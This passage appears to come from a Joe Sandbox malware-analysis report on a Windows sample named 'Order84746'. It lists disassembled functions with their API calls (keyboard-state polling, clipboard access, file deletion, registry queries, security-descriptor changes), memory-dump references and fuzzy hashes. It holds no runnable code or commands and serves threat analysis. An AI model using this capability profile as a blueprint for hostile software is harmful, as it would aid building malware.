                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0094F3E3
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0094F3EE
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0094F411
                          • _wcscat.LIBCMT ref: 0094F441
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0094F458
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0094F471
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0094F488
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0094F4AA
                          • DragFinish.SHELL32(?), ref: 0094F4B1
                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0094F59C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 2166380349-3440237614
                          • Opcode ID: 86b45d1caff32bc89af63fad97b35a3ce2425521be5fdabe1a6320212660ea4a
                          • Instruction ID: 21d919b91e2148f6f391c8dc53e2159793f11339ea77d4e85256d9b07eef4e87
                          • Opcode Fuzzy Hash: 86b45d1caff32bc89af63fad97b35a3ce2425521be5fdabe1a6320212660ea4a
                          • Instruction Fuzzy Hash: 4F614871508341AFC711EF69CC85EAFBBE8FF89714F000A1EF695921A1DB719A09CB52
                          Function 00931C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00931CAB
                          • _wcscmp.LIBCMT ref: 00931CC0
                          • _wcscmp.LIBCMT ref: 00931CD7
                            • Part of subcall function 00926BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00926BEF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00931D06
                          • FindClose.KERNEL32(00000000), ref: 00931D11
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00931D2D
                          • _wcscmp.LIBCMT ref: 00931D54
                          • _wcscmp.LIBCMT ref: 00931D6B
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00931D7D
                          • SetCurrentDirectoryW.KERNEL32(009939FC), ref: 00931D9B
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00931DA5
                          • FindClose.KERNEL32(00000000), ref: 00931DB2
                          • FindClose.KERNEL32(00000000), ref: 00931DC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: 72d2229150409b99ecc0b7eeede0b0c013f2b508aa270129c729114900ce6e65
                          • Instruction ID: f59b2040bdf696192b3d090ec230b207a5d84dd8c23b3833f5ab2537fb827a1f
                          • Opcode Fuzzy Hash: 72d2229150409b99ecc0b7eeede0b0c013f2b508aa270129c729114900ce6e65
                          • Instruction Fuzzy Hash: 7D310832A05619AECF14AFA4DC09BDE37EDAF46324F104555F821A70E0DB70DE459F50
                          Function 0093091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 009309DF
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 009309EF
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009309FB
                          • __wsplitpath.LIBCMT ref: 00930A59
                          • _wcscat.LIBCMT ref: 00930A71
                          • _wcscat.LIBCMT ref: 00930A83
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00930A98
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930AAC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930ADE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930AFF
                          • _wcscpy.LIBCMT ref: 00930B0B
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00930B4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: 08a0b57e635c59cc0ea7dbe5b1534d3f844ac4a719e9389485b9643ce8fa7aec
                          • Instruction ID: 3dc801ca58204a668861ed8be8ba75c08b14e089953feaead15602efca6cc683
                          • Opcode Fuzzy Hash: 08a0b57e635c59cc0ea7dbe5b1534d3f844ac4a719e9389485b9643ce8fa7aec
                          • Instruction Fuzzy Hash: 936145725082059FDB10EF64C855AAEB3E8FFC9310F04891AE999C7252DB31EA45CF92
                          Function 0094EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0094EF3B
                          • GetFocus.USER32 ref: 0094EF4B
                          • GetDlgCtrlID.USER32(00000000), ref: 0094EF56
                          • _memset.LIBCMT ref: 0094F081
                          • GetMenuItemInfoW.USER32 ref: 0094F0AC
                          • GetMenuItemCount.USER32(00000000), ref: 0094F0CC
                          • GetMenuItemID.USER32(?,00000000), ref: 0094F0DF
                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0094F113
                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0094F15B
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0094F193
                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0094F1C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                          • String ID: 0
                          • API String ID: 3616455698-4108050209
                          • Opcode ID: 1b95dcf43f999abb829296dbe84a997f5ae71c7476be89032481c37ebeedcc35
                          • Instruction ID: acc2a3b6868ba2218bd83283ca4151cc7c3b4f392e0e676a183ff93daab3d4af
                          • Opcode Fuzzy Hash: 1b95dcf43f999abb829296dbe84a997f5ae71c7476be89032481c37ebeedcc35
                          • Instruction Fuzzy Hash: FB818C71609316AFDB20CF24C894E6BBBE9FF88314F04492EF99597291D770D905CBA2
                          Function 0091A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
                            • Part of subcall function 0091ABBB: GetLastError.KERNEL32(?,0091A69F,?,?,?), ref: 0091ABE1
                            • Part of subcall function 0091ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0091A69F,?,?,?), ref: 0091ABF0
                            • Part of subcall function 0091ABBB: RtlAllocateHeap.NTDLL(00000000,?,0091A69F), ref: 0091ABF7
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0091AC0E
                            • Part of subcall function 0091AC56: GetProcessHeap.KERNEL32(00000008,0091A6B5,00000000,00000000,?,0091A6B5,?), ref: 0091AC62
                            • Part of subcall function 0091AC56: RtlAllocateHeap.NTDLL(00000000,?,0091A6B5), ref: 0091AC69
                            • Part of subcall function 0091AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0091A6B5,?), ref: 0091AC7A
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091A6D0
                          • _memset.LIBCMT ref: 0091A6E5
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091A704
                          • GetLengthSid.ADVAPI32(?), ref: 0091A715
                          • GetAce.ADVAPI32(?,00000000,?), ref: 0091A752
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0091A76E
                          • GetLengthSid.ADVAPI32(?), ref: 0091A78B
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0091A79A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091A7A1
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091A7C2
                          • CopySid.ADVAPI32(00000000), ref: 0091A7C9
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0091A7FA
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0091A820
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0091A834
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: 42cdaf8cf27e916885efb8b753d58a29c47a4b6045ca76c33282ea6fd48c6891
                          • Instruction ID: e64d7b81f207046649899bb48bbe759e2b3877a26f81272271a3b124df440406
                          • Opcode Fuzzy Hash: 42cdaf8cf27e916885efb8b753d58a29c47a4b6045ca76c33282ea6fd48c6891
                          • Instruction Fuzzy Hash: 9F516B71A01209AFDF01DFA1DC44AEEBBB9FF04310F048169F821A72A1DB749E46DB61
                          Function 008E6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                          • API String ID: 0-4052911093
                          • Opcode ID: c460eddb67d2bbc2817e867fd2e9cfca62b30574a258f3e02aa05886dfd70b43
                          • Instruction ID: d59c8ec531c011fedab7124c574f2c21a72497f141626a0e3ddb65927ecaca10
                          • Opcode Fuzzy Hash: c460eddb67d2bbc2817e867fd2e9cfca62b30574a258f3e02aa05886dfd70b43
                          • Instruction Fuzzy Hash: 25729071E04259DBDF24CF59C8807AEB7B5FF49314F14816AE809EB280EB749E81DB90
                          Function 009263F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00925FA6,?), ref: 00926ED8
                            • Part of subcall function 009272CB: GetFileAttributesW.KERNEL32(?,00926019), ref: 009272CC
                          • _wcscat.LIBCMT ref: 00926441
                          • __wsplitpath.LIBCMT ref: 0092645F
                          • FindFirstFileW.KERNEL32(?,?), ref: 00926474
                          • _wcscpy.LIBCMT ref: 009264A3
                          • _wcscat.LIBCMT ref: 009264B8
                          • _wcscat.LIBCMT ref: 009264CA
                          • DeleteFileW.KERNEL32(?), ref: 009264DA
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 009264EB
                          • FindClose.KERNEL32(00000000), ref: 00926506
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                          • String ID: \*.*
                          • API String ID: 2643075503-1173974218
                          • Opcode ID: 490bc8e9f357e430cd13403a072d5ffdc2695e4343d30af342b51096a1ec9395
                          • Instruction ID: 6cb2f4ab96ceadd5cb258d94e00f1c78dc729d35036d420139612a8f77b24cb1
                          • Opcode Fuzzy Hash: 490bc8e9f357e430cd13403a072d5ffdc2695e4343d30af342b51096a1ec9395
                          • Instruction Fuzzy Hash: 1031A2B240D3949EC721EBA49885EDBB7DCAF96300F00091EF5D8C3141EB35D50987A7
                          Function 009431BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094328E
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0094332D
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009433C5
                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00943604
                          • RegCloseKey.ADVAPI32(00000000), ref: 00943611
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: fe4500f2731ddcb5aa54d9ac66348be7ee8c9bf2eec48f4355f622c59fefebb9
                          • Instruction ID: c5d89d3bed0c8e6799ff0faba030a98517fff33d927e7ef0f95f367038e256e8
                          • Opcode Fuzzy Hash: fe4500f2731ddcb5aa54d9ac66348be7ee8c9bf2eec48f4355f622c59fefebb9
                          • Instruction Fuzzy Hash: 5CE15B31604210AFCB14DF29C995E6ABBE8FF89310F04896DF55AD72A2DB30ED05CB52
                          Function 00922B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00922B5F
                          • GetAsyncKeyState.USER32(000000A0), ref: 00922BE0
                          • GetKeyState.USER32(000000A0), ref: 00922BFB
                          • GetAsyncKeyState.USER32(000000A1), ref: 00922C15
                          • GetKeyState.USER32(000000A1), ref: 00922C2A
                          • GetAsyncKeyState.USER32(00000011), ref: 00922C42
                          • GetKeyState.USER32(00000011), ref: 00922C54
                          • GetAsyncKeyState.USER32(00000012), ref: 00922C6C
                          • GetKeyState.USER32(00000012), ref: 00922C7E
                          • GetAsyncKeyState.USER32(0000005B), ref: 00922C96
                          • GetKeyState.USER32(0000005B), ref: 00922CA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 4b6bedc1ae0442e53716200eb90486416c4e4d684d459714f525ddf49e157842
                          • Instruction ID: 2f5b222d2f892466654a67228f821d05be9276f84eacb2a636e22f5ca7a56908
                          • Opcode Fuzzy Hash: 4b6bedc1ae0442e53716200eb90486416c4e4d684d459714f525ddf49e157842
                          • Instruction Fuzzy Hash: D341FA30A087D97DFF31DB60A8043B9BEA86F12314F04809DD5C6566C9DBE499C8C7A2
                          Function 00936D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: 2ee1744a1a67647595bf98e6a26511024e50fbbaba2e6215a4f70647234aceaa
                          • Instruction ID: 9b218781a545d0ba06c2f0cfcd7bc1a81887e52a090752c447ba07d6aabf8b65
                          • Opcode Fuzzy Hash: 2ee1744a1a67647595bf98e6a26511024e50fbbaba2e6215a4f70647234aceaa
                          • Instruction Fuzzy Hash: CE21AE31715210AFDB11AF69DC49B2D77A8FF44710F05841AF96ADB2A1CBB4ED009FA1
                          Function 0093C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00919ABF: CLSIDFromProgID.COMBASE ref: 00919ADC
                            • Part of subcall function 00919ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00919AF7
                            • Part of subcall function 00919ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00919B05
                            • Part of subcall function 00919ABF: CoTaskMemFree.COMBASE(00000000), ref: 00919B15
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0093C235
                          • _memset.LIBCMT ref: 0093C242
                          • _memset.LIBCMT ref: 0093C360
                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0093C38C
                          • CoTaskMemFree.COMBASE(?), ref: 0093C397
                          Strings
                          • NULL Pointer assignment, xrefs: 0093C3E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 1300414916-2785691316
                          • Opcode ID: 09eb6aeb1655a68ef1e3d41019dd226fdeadf6f1d7cfc7bb02c2fa457e789c33
                          • Instruction ID: c13539fc8aa45d3d5ba86e87d1efa068ee5f3d0a5bdc340fdf22532171bfc6a5
                          • Opcode Fuzzy Hash: 09eb6aeb1655a68ef1e3d41019dd226fdeadf6f1d7cfc7bb02c2fa457e789c33
                          • Instruction Fuzzy Hash: A7912971D00228ABDB10DF95DC95EEEBBB8EF48710F10812AF515B7291DB705A45CFA0
                          Function 009213CA Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 560stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009213DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                          • API String ID: 1659193697-2318614619
                          • Opcode ID: 3039cbe9962e5a89e78f66ac6e39ee14342b9b29e5f6feb6aa8d75a6657e0bf7
                          • Instruction ID: 97719c8eb6c69d7d8b8bcaa79fce38794b39363dffe693993a4823d975e69b38
                          • Opcode Fuzzy Hash: 3039cbe9962e5a89e78f66ac6e39ee14342b9b29e5f6feb6aa8d75a6657e0bf7
                          • Instruction Fuzzy Hash: 90325674A007159FC728DF29D480A6AB7F0FF58320B11C46EE59ADB3A6E770E991CB44
                          Function 00950133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • GetSystemMetrics.USER32(0000000F), ref: 0095016D
